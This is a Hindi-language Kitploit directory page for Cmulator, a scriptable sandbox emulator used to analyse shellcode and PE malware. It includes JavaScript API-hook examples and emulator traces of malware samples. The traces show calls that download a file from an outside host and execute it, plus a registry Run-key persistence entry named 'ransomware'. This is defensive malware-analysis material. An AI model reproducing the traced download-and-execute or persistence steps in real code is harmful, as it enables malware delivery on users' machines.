Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Cmulator — Cmulator ( x86 - x64 ) शेलकोड और PE बाइनरी के लिए एक स्क्रिप्टेबल रिवर्स इंजीनियरिंग सैंडबॉक्स एमुलेटर है। यह Unicorn और Zydis Engine और javascript पर आधारित है। | Kitploit
उपकरण/GitHubGitHub/coldzer0/cmulator
गतिशील विश्लेषण (सैंडबॉक्सिंग)रिवर्स इंजीनियरिंगस्क्रिप्टिंग और स्वचालनशेलकोडडीबगर्समालवेयर विश्लेषणबाइनरी विश्लेषणArchived
GitHubcoldzer0/cmulator

Cmulator

Cmulator ( x86 - x64 ) शेलकोड और PE बाइनरी के लिए एक स्क्रिप्टेबल रिवर्स इंजीनियरिंग सैंडबॉक्स एमुलेटर है। यह Unicorn और Zydis Engine और javascript पर आधारित है।

रिपॉजिटरी देखें
30463234 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Cmulator - स्क्रिप्टेबल x86 RE सैंडबॉक्स एमुलेटर (v0.3 Beta)

License: AGPL v3

Cmulator (x86 - x64) है
शेलकोड और PE बाइनरीज़ के लिए स्क्रिप्टेबल रिवर्स इंजीनियरिंग सैंडबॉक्स एमुलेटर
Unicorn & Capstone Engine और javascript पर आधारित।

💬 यह अंतिम समर्थित Pascal संस्करण है और नया कोड बेस (C/C++) यहाँ होगा Cmulator।

समर्थित आर्किटेक्चर:

  • i386
  • x86-64

समर्थित फ़ाइल प्रारूप

  • PE, PE+
  • शेलकोड

ज्ञात समस्याएँ

  • EIP के पास डेटा संशोधित करने में Unicorn में एक बग है
    यदि कोई मदद कर सकता है तो कृपया देखें unicorn#820

वर्तमान विशेषताएँ

  • अनुकरण GDT और सेगमेंट।
  • शेलकोड और PE दोनों के लिए अनुकरण TEB और PEB संरचनाएँ।
  • अनुकरण LDR तालिका और डेटा।
  • इमेज और स्टैक मेमोरी का प्रबंधन करता है।
  • DLL निर्यात के आधार पर फ़ंक्शन का मूल्यांकन करता है।
  • सभी निष्पादित API को ट्रेस करता है (अस्पष्टित PE के लिए अच्छा)।
  • संदर्भित मेमोरी स्थानों के आधार पर स्ट्रिंग्स के साथ HexDump प्रदर्शित करता है।
  • मेमोरी को पैच करना।
  • Javascript (स्क्रिप्टिंग) का उपयोग कर कस्टम API हुक।
  • SEH को संभालें (अभी और काम की आवश्यकता है)।
  • [+] हुक पता।
  • [+] Apiset मैप रिज़ॉल्वर


[+] परिवर्तन लॉग

  • V0.3 Beta

    • यह अंतिम समर्थित Pascal संस्करण है और नया कोड बेस (C/C++) यहाँ होगा https://github.com/Cmulator/Cmulator।
  • v0.2 beta

    • [+] हुक पता जोड़ें
    • [+] Api स्कीमा फ़ॉरवर्डर लागू करना
    • [+] डिसअसेंबलर को Capstone से Zydis इंजन में बदलें
    • [√] SEH हैंडलिंग में सुधार
    • [√] JS से API हैंडल में सुधार
    • [√] पते या नाम या ऑर्डिनल द्वारा API का पता लगाने में सुधार
  • v0.1 beta

    • प्रारंभिक संस्करण



Hook Example JavaScript

var GetModuleFileName = new ApiHook();
/*
DWORD WINAPI GetModuleFileName(
  _In_opt_ HMODULE hModule,
  _Out_    LPTSTR  lpFilename,
  _In_     DWORD   nSize
);
*/
GetModuleFileName.OnCallBack = function (Emu, API, ret) {

	Emu.pop(); // ret
	
	var hModule    = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.pop();
	var lpFilename = Emu.isx64 ? Emu.ReadReg(REG_RDX) : Emu.pop();
	var nSize	   = Emu.isx64 ? Emu.ReadReg(REG_R8D) : Emu.pop();

	var mName = Emu.GetModuleName(hModule);
	var Path = 'C:\\pla\\' + mName;

	var len = API.IsWapi ? Emu.WriteStringW(lpFilename,Path) : Emu.WriteStringA(lpFilename,Path);

	// null byte - mybe needed maybe not :D - i put it anyway :V 
	API.IsWapi ? Emu.WriteWord(lpFilename + (len * 2),0) : Emu.WriteByte(lpFilename+len,0);

	print("{0}(0x{1}, 0x{2}, 0x{3}) = '{4}'".format(
		API.name,
		hModule.toString(16),
		lpFilename.toString(16),
		nSize.toString(16),
		Path
	));

	// MS Docs : the return value is the length of the string
	Emu.SetReg(Emu.isx64 ? REG_RAX : REG_EAX, len);	
	Emu.SetReg(Emu.isx64 ? REG_RIP : REG_EIP, ret);
	return true; // true if you handle it false if you want Emu to handle it and set PC .
};

GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameA');
GetModuleFileName.install('kernel32.dll', 'GetModuleFileNameW');

var _vsnprintf = new ApiHook();
/*
int _vsnprintf(  
   char *buffer,  
   size_t count,  
   const char *format,  
   va_list argptr   
);
*/
_vsnprintf.OnCallBack = function (Emu, API, ret) {

	// save the param to args
	// args is an Array and it's implemented in every ApiHook .
	_vsnprintf.args[0] = Emu.isx64 ? Emu.ReadReg(REG_RCX) : Emu.ReadDword(Emu.ReadReg(REG_ESP) + 4);

	// i think implementing this in JS is hard 
	// so just let the library handle it :D 
	return true; // True so we continue to the lib code .
};

// OnExit Callback ..
_vsnprintf.OnExit = function(Emu,API){
	
	// Read Our Saved Param .
	var buffer = _vsnprintf.args[0];

	warn("OnExit : _vsnprintf() = '{0}' ".format(
		Emu.ReadStringA(buffer)
	));
}

_vsnprintf.install('msvcrt.dll', '_vsnprintf');


उदाहरण आउटपुट :

AntiDebug डाउनलोडर

Coldzer0 @ OSX $./Cmulator -f ../../samples/AntiDebugDownloader.exe -q

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 01:51:51
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"AntiDebugDownloader.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : AntiDebugDownloader.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000004000
[---------------------------------------]

[---------------------------------------]
[            Fixing PE Imports          ]

[*] File Name  : AntiDebugDownloader.exe
[*] Import 3 Dlls

[+] Fix IAT for : kernel32.dll

[+] Fix IAT for : urlmon.dll

[+] Fix IAT for : advapi32.dll

[---------------------------------------]

[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 52 Libraries ...

[>] Run AntiDebugDownloader.exe

0x401005 : IsDebuggerPresent = 0
GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows' 
0x40103d : URLDownloadToFileA(0, 'https://www.dropbox.com/s/fr3z6axblxfcmq8/UrlDownLoadtoFile.exe?dl=0', 'C:\Windows', 0, 0)
0x401051 : RegCreateKeyA(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 0x403159) = 144
0x40106f : RegSetValueExA(144, 'ransomware', 0, REG_SZ, 'C:\Windows', 260)
0x40107a : RegCloseKey()
ExitProcess(0x0)

26 Branches - Executed in 9 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)



Press Enter to Close ¯\_(ツ)_/¯

x64 डाउनलोड और Exec शेलकोड

Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/down_exec64.sc -sc -x64

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"sc64.exe" is : x64
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn

[---------------- PE Info --------------]
[*] File Name        : sc64.exe
[*] Image Base       : 0000000000400000
[*] Address Of Entry : 0000000000001000
[*] Size Of Headers  : 0000000000000400
[*] Size Of Image    : 0000000000002000
[---------------------------------------]
[*] Writing Shellcode to memory ...
[√] Shellcode Written to Unicorn

[---------------------------------------]
[            Fixing PE Imports          ]

[*] File Name  : sc64.exe
[*] Import 0 Dlls

[---------------------------------------]

[+] Segments & (TIB - PEB) Init Done .

[+] Loading JS Main Script : ../API.JS

Initiating 25 Libraries ...

[>] Run sc64.exe

LoadLibraryA('urlmon') = 0x70714000
GetProcAddress(0x70714000,'URLDownloadToFileA') = 0x707ADB10
0x40111b : URLDownloadToFileA(0, 'http://192.168.10.129/pl.exe', 'C:\\Users\\Public\\p.exe', 0, 2489880)
SetFileAttributesA('C:\\Users\\Public\\p.exe',0x2)
WinExec('C:\\Users\\Public\\p.exe', 0)
FatalExit(0x0)

95 Steps - Executed in 295 ms

Cmulator Stop >> last Error : OK (UC_ERR_OK)



Press Enter to Close ¯\_(ツ)_/¯


x32 डाउनलोड और Exec शेलकोड

Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/URLDownloadToFile.sc -sc

Cmulator Malware Analyzer - By Coldzer0

Compiled on      : 2018/09/29 - 03:07:11
Target CPU       : i386 & x86_x64
Unicorn Engine   : v1.0 
Cmulator         : v0.1

"sc32.exe" is : x32
Mapping the File ..

[+] Unicorn Init done  .
[√] Set Hooks
[√] PE Mapped to Unicorn
[√] PE Written to Unicorn
टूल डाउनलोड करें